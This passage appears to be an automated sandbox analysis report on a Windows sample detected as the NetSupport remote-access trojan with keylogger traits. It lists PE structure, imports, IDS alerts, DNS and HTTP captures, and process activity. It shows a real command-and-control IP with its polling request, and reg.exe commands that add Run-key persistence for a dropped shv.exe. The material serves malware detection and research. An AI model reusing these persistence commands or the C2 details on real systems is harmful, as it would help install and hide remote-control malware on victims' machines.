                                                                                      mov esi, dword ptr [esp+40h]
                                                                                      dec eax
                                                                                      mov edi, dword ptr [esp+48h]
                                                                                      dec eax
                                                                                      add esp, 20h
                                                                                      inc ecx
                                                                                      pop esi
                                                                                      ret
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      dec eax
                                                                                      sub esp, 48h
                                                                                      dec eax
                                                                                      lea ecx, dword ptr [esp+20h]
                                                                                      call 00007FB77D08C553h
                                                                                      dec eax
                                                                                      lea edx, dword ptr [00025747h]
                                                                                      dec eax
                                                                                      lea ecx, dword ptr [esp+20h]
                                                                                      call 00007FB77D09EDA2h
                                                                                      int3
                                                                                      jmp 00007FB77D0A4F84h
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3
                                                                                      int3

                                                                                      Rich Headers

                                                                                      Programming Language:
                                                                                      • [ C ] VS2008 SP1 build 30729
                                                                                      • [IMP] VS2008 SP1 build 30729

                                                                                      Data Directories

                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x597a00x34.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x597d40x50.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x700000xe360.rsrc
                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x6a0000x306c.pdata
                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x7f0000x970.reloc
                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x536c00x54.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x537800x28.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x4b3f00x140.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x480000x508.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x588bc0x120.rdata
                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                      Sections

                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                      .text0x10000x4676e0x46800f06bb06e02377ae8b223122e53be35c2False0.5372340425531915data6.47079645411382IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                      .rdata0x480000x128c40x12a002de06d4a6920a6911e64ff20000ea72fFalse0.4499003775167785data5.273999097784603IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .data0x5b0000xe75c0x1a000dbdb901a7d477980097e42e511a94fbFalse0.28275240384615385data3.2571023907881185IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                      .pdata0x6a0000x306c0x3200b0ce0f057741ad2a4ef4717079fa34e9False0.483359375data5.501810413666288IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .didat0x6e0000x3600x4001fcc7b1d7a02443319f8fcc2be4ca936False0.2578125data3.0459938492946015IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                      _RDATA0x6f0000x15c0x2003f331ec50f09ba861beaf955b33712d5False0.408203125data3.3356393424384843IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .rsrc0x700000xe3600xe4002ce7b064b562668bb9f9675200fd1906False0.6302425986842105data6.596823435141548IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                      .reloc0x7f0000x9700xa0077a9ddfc47a5650d6eebbcc823e39532False0.52421875data5.336289720085303IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                      Resources

                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                      PNG0x706800xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
                                                                                      PNG0x711c80x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
                                                                                      RT_ICON0x727780x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.47832369942196534
                                                                                      RT_ICON0x72ce00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.5410649819494585
                                                                                      RT_ICON0x735880xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colorsEnglishUnited States0.4933368869936034
                                                                                      RT_ICON0x744300x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/mEnglishUnited States0.5390070921985816
                                                                                      RT_ICON0x748980x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/mEnglishUnited States0.41393058161350843
                                                                                      RT_ICON0x759400x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/mEnglishUnited States0.3479253112033195
                                                                                      RT_ICON0x77ee80x3d71PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9809269502193401
                                                                                      RT_DIALOG0x7c5b80x286dataEnglishUnited States0.5092879256965944
                                                                                      RT_DIALOG0x7c3880x13adataEnglishUnited States0.60828025477707
                                                                                      RT_DIALOG0x7c4c80xecdataEnglishUnited States0.6991525423728814
                                                                                      RT_DIALOG0x7c2580x12edataEnglishUnited States0.5927152317880795
                                                                                      RT_DIALOG0x7bf200x338dataEnglishUnited States0.45145631067961167
                                                                                      RT_DIALOG0x7bcc80x252dataEnglishUnited States0.5757575757575758
                                                                                      RT_STRING0x7cf980x1e2dataEnglishUnited States0.3900414937759336
                                                                                      RT_STRING0x7d1800x1ccdataEnglishUnited States0.4282608695652174
                                                                                      RT_STRING0x7d3500x1b8dataEnglishUnited States0.45681818181818185
                                                                                      RT_STRING0x7d5080x146dataEnglishUnited States0.5153374233128835
                                                                                      RT_STRING0x7d6500x46cdataEnglishUnited States0.3454063604240283
                                                                                      RT_STRING0x7dac00x166dataEnglishUnited States0.49162011173184356
                                                                                      RT_STRING0x7dc280x152dataEnglishUnited States0.5059171597633136
                                                                                      RT_STRING0x7dd800x10adataEnglishUnited States0.49624060150375937
                                                                                      RT_STRING0x7de900xbcdataEnglishUnited States0.6329787234042553
                                                                                      RT_STRING0x7df500x1c0dataEnglishUnited States0.5178571428571429
                                                                                      RT_STRING0x7e1100x250dataEnglishUnited States0.44256756756756754
                                                                                      RT_GROUP_ICON0x7bc600x68dataEnglishUnited States0.7019230769230769
                                                                                      RT_MANIFEST0x7c8400x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.39786666666666665

                                                                                      Imports

                                                                                      DLLImport
                                                                                      KERNEL32.dllLocalFree, GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, GetCurrentProcessId, CreateDirectoryW, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetModuleFileNameW, SetCurrentDirectoryW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, ExpandEnvironmentStringsW, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, GlobalMemoryStatusEx, LoadResource, SizeofResource, GetTimeFormatW, GetDateFormatW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, IsValidCodePage, FindNextFileA, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, InitializeCriticalSectionAndSpinCount, WaitForSingleObjectEx, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, RtlPcToFileHeader, RtlUnwindEx, EncodePointer, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, GetStringTypeW, HeapReAlloc, LCMapStringW, FindFirstFileExA
                                                                                      OLEAUT32.dllSysAllocString, SysFreeString, VariantClear
                                                                                      gdiplus.dllGdipCloneImage, GdipFree, GdipDisposeImage, GdipCreateBitmapFromStream, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipAlloc

                                                                                      Possible Origin

                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                      EnglishUnited States

                                                                                      Network Behavior

                                                                                      Suricata IDS Alerts

                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                      2024-11-25T14:58:03.946249+01002827745ETPRO MALWARE NetSupport RAT CnC Activity1192.168.2.44973045.61.128.74443TCP

                                                                                      Network Port Distribution

                                                                                      TCP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Nov 25, 2024 14:58:03.946249008 CET49730443192.168.2.445.61.128.74
                                                                                      Nov 25, 2024 14:58:03.946285009 CET4434973045.61.128.74192.168.2.4
                                                                                      Nov 25, 2024 14:58:03.946342945 CET49730443192.168.2.445.61.128.74
                                                                                      Nov 25, 2024 14:58:04.026742935 CET49730443192.168.2.445.61.128.74
                                                                                      Nov 25, 2024 14:58:04.026760101 CET4434973045.61.128.74192.168.2.4
                                                                                      Nov 25, 2024 14:58:04.026837111 CET4434973045.61.128.74192.168.2.4
                                                                                      Nov 25, 2024 14:58:04.793548107 CET4973180192.168.2.4104.26.1.231
                                                                                      Nov 25, 2024 14:58:04.913762093 CET8049731104.26.1.231192.168.2.4
                                                                                      Nov 25, 2024 14:58:04.913844109 CET4973180192.168.2.4104.26.1.231
                                                                                      Nov 25, 2024 14:58:04.914463997 CET4973180192.168.2.4104.26.1.231
                                                                                      Nov 25, 2024 14:58:05.035070896 CET8049731104.26.1.231192.168.2.4
                                                                                      Nov 25, 2024 14:58:06.341289043 CET8049731104.26.1.231192.168.2.4
                                                                                      Nov 25, 2024 14:58:06.341442108 CET4973180192.168.2.4104.26.1.231
                                                                                      Nov 25, 2024 14:59:54.192513943 CET4973180192.168.2.4104.26.1.231
                                                                                      Nov 25, 2024 14:59:54.316920996 CET8049731104.26.1.231192.168.2.4
                                                                                      Nov 25, 2024 14:59:54.316977024 CET4973180192.168.2.4104.26.1.231

                                                                                      UDP Packets

                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                      Nov 25, 2024 14:58:04.646657944 CET6236153192.168.2.41.1.1.1
                                                                                      Nov 25, 2024 14:58:04.787056923 CET53623611.1.1.1192.168.2.4

                                                                                      DNS Queries

                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                      Nov 25, 2024 14:58:04.646657944 CET192.168.2.41.1.1.10x5217Standard query (0)geo.netsupportsoftware.comA (IP address)IN (0x0001)false

                                                                                      DNS Answers

                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                      Nov 25, 2024 14:58:04.787056923 CET1.1.1.1192.168.2.40x5217No error (0)geo.netsupportsoftware.com104.26.1.231A (IP address)IN (0x0001)false
                                                                                      Nov 25, 2024 14:58:04.787056923 CET1.1.1.1192.168.2.40x5217No error (0)geo.netsupportsoftware.com104.26.0.231A (IP address)IN (0x0001)false
                                                                                      Nov 25, 2024 14:58:04.787056923 CET1.1.1.1192.168.2.40x5217No error (0)geo.netsupportsoftware.com172.67.68.212A (IP address)IN (0x0001)false

                                                                                      HTTP Request Dependency Graph

                                                                                      • 45.61.128.74connection: keep-alivecmd=pollinfo=1ack=1
                                                                                      • geo.netsupportsoftware.com

                                                                                      HTTP Packets

                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      0192.168.2.44973045.61.128.744433492C:\Users\Public\Netstat\shv.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 25, 2024 14:58:04.026742935 CET216OUTPOST http://45.61.128.74/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 45.61.128.74Connection: Keep-AliveCMD=POLLINFO=1ACK=1
                                                                                      Data Raw:
                                                                                      Data Ascii:


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      1192.168.2.449731104.26.1.231803492C:\Users\Public\Netstat\shv.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      Nov 25, 2024 14:58:04.914463997 CET118OUTGET /location/loca.asp HTTP/1.1
                                                                                      Host: geo.netsupportsoftware.com
                                                                                      Connection: Keep-Alive
                                                                                      Cache-Control: no-cache
                                                                                      Nov 25, 2024 14:58:06.341289043 CET965INHTTP/1.1 200 OK
                                                                                      Date: Mon, 25 Nov 2024 13:58:06 GMT
                                                                                      Content-Type: text/html; Charset=utf-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: keep-alive
                                                                                      CF-Ray: 8e8226ce8d1b0f6b-EWR
                                                                                      CF-Cache-Status: DYNAMIC
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Cache-Control: private
                                                                                      Set-Cookie: ASPSESSIONIDCQRCRQBQ=EDIKMHACKPCOMDMHBDCPBJHK; path=/
                                                                                      cf-apo-via: origin,host
                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                      X-Powered-By: ASP.NET
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R9kIa6TwXGgTbqJessi%2BgT63EzlVubLMBObIW9z7E3zlBZDbxTjCg1qazs6jy2hU6vE2xGjETL%2FMC5dozHkCb1iXHL85WFrHphTMU1XPB7oypOlxibb9LUkIuzGDmDvfws7cCa%2FYI5YtMD%2Bv"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1563&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=193&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                      Data Raw: 31 30 0d 0a 34 30 2e 37 33 35 37 2c 2d 37 34 2e 31 37 32 34 0d 0a 30 0d 0a 0d 0a
                                                                                      Data Ascii: 1040.7357,-74.17240


                                                                                      Statistics

                                                                                      CPU Usage

                                                                                      Click to jump to process

                                                                                      Memory Usage

                                                                                      Click to jump to process

                                                                                      High Level Behavior Distribution

                                                                                      Click to dive into process behavior distribution

                                                                                      Behavior

                                                                                      Click to jump to process

                                                                                      System Behavior

                                                                                      General

                                                                                      Target ID:0
                                                                                      Start time:08:58:01
                                                                                      Start date:25/11/2024
                                                                                      Path:C:\Users\user\Desktop\file.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                      Imagebase:0x7ff6fe180000
                                                                                      File size:2'283'788 bytes
                                                                                      MD5 hash:A3CEA314D888A08B79002656A9F4B927
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000000.00000003.1675691550.000001AFA17C4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000000.00000003.1675726387.000001AFA17C4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000000.00000003.1674859649.000001AFA17C2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000000.00000003.1673741447.000001AFA55A0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:1
                                                                                      Start time:08:58:02
                                                                                      Start date:25/11/2024
                                                                                      Path:C:\Windows\System32\cmd.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" "
                                                                                      Imagebase:0x7ff798f30000
                                                                                      File size:289'792 bytes
                                                                                      MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:2
                                                                                      Start time:08:58:02
                                                                                      Start date:25/11/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7699e0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:3
                                                                                      Start time:08:58:02
                                                                                      Start date:25/11/2024
                                                                                      Path:C:\Windows\System32\reg.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"
                                                                                      Imagebase:0x7ff700300000
                                                                                      File size:77'312 bytes
                                                                                      MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:4
                                                                                      Start time:08:58:02
                                                                                      Start date:25/11/2024
                                                                                      Path:C:\Windows\System32\reg.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"
                                                                                      Imagebase:0x7ff700300000
                                                                                      File size:77'312 bytes
                                                                                      MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:5
                                                                                      Start time:08:58:02
                                                                                      Start date:25/11/2024
                                                                                      Path:C:\Users\Public\Netstat\shv.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Users\Public\Netstat\shv.exe
                                                                                      Imagebase:0xf00000
                                                                                      File size:105'848 bytes
                                                                                      MD5 hash:8D9709FF7D9C83BD376E01912C734F0A
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000002.4131581542.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000000.1680595805.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000002.4133041129.000000006CDB0000.00000002.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\shv.exe, Author: Joe Security
                                                                                      Antivirus matches:
                                                                                      • Detection: 29%, ReversingLabs
                                                                                      Reputation:moderate
                                                                                      Has exited:false

                                                                                      General

                                                                                      Target ID:6
                                                                                      Start time:08:58:02
                                                                                      Start date:25/11/2024
                                                                                      Path:C:\Windows\System32\reg.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:REG ADD "HKCU\SOFTWARE\Software\Supservice\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"
                                                                                      Imagebase:0x7ff700300000
                                                                                      File size:77'312 bytes
                                                                                      MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:7
                                                                                      Start time:08:58:03
                                                                                      Start date:25/11/2024
                                                                                      Path:C:\Windows\System32\reg.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:REG ADD "HKCU\SOFTWARE\Software\Supservice\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"
                                                                                      Imagebase:0x7ff700300000
                                                                                      File size:77'312 bytes
                                                                                      MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:8
                                                                                      Start time:08:58:03
                                                                                      Start date:25/11/2024
                                                                                      Path:C:\Users\Public\Netstat\shv.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Users\Public\Netstat\shv.exe
                                                                                      Imagebase:0xf00000
                                                                                      File size:105'848 bytes
                                                                                      MD5 hash:8D9709FF7D9C83BD376E01912C734F0A
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000008.00000000.1691809237.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000008.00000002.1694138825.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000008.00000002.1694399599.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000008.00000002.1694399599.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000008.00000002.1694438358.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:9
                                                                                      Start time:08:58:14
                                                                                      Start date:25/11/2024
                                                                                      Path:C:\Users\Public\Netstat\shv.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\Public\Netstat\shv.exe"
                                                                                      Imagebase:0xf00000
                                                                                      File size:105'848 bytes
                                                                                      MD5 hash:8D9709FF7D9C83BD376E01912C734F0A
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000009.00000002.1806388208.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000009.00000002.1805359841.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000009.00000002.1806208659.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000009.00000002.1806208659.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000009.00000000.1802595368.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:11
                                                                                      Start time:08:58:23
                                                                                      Start date:25/11/2024
                                                                                      Path:C:\Users\Public\Netstat\shv.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\Public\Netstat\shv.exe"
                                                                                      Imagebase:0xf00000
                                                                                      File size:105'848 bytes
                                                                                      MD5 hash:8D9709FF7D9C83BD376E01912C734F0A
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000B.00000002.1886663530.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000B.00000000.1884540195.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000B.00000002.1886119575.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000B.00000002.1886628907.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000B.00000002.1886628907.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:14
                                                                                      Start time:08:58:31
                                                                                      Start date:25/11/2024
                                                                                      Path:C:\Users\Public\Netstat\shv.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\Public\Netstat\shv.exe"
                                                                                      Imagebase:0xf00000
                                                                                      File size:105'848 bytes
                                                                                      MD5 hash:8D9709FF7D9C83BD376E01912C734F0A
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000E.00000002.1968165061.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
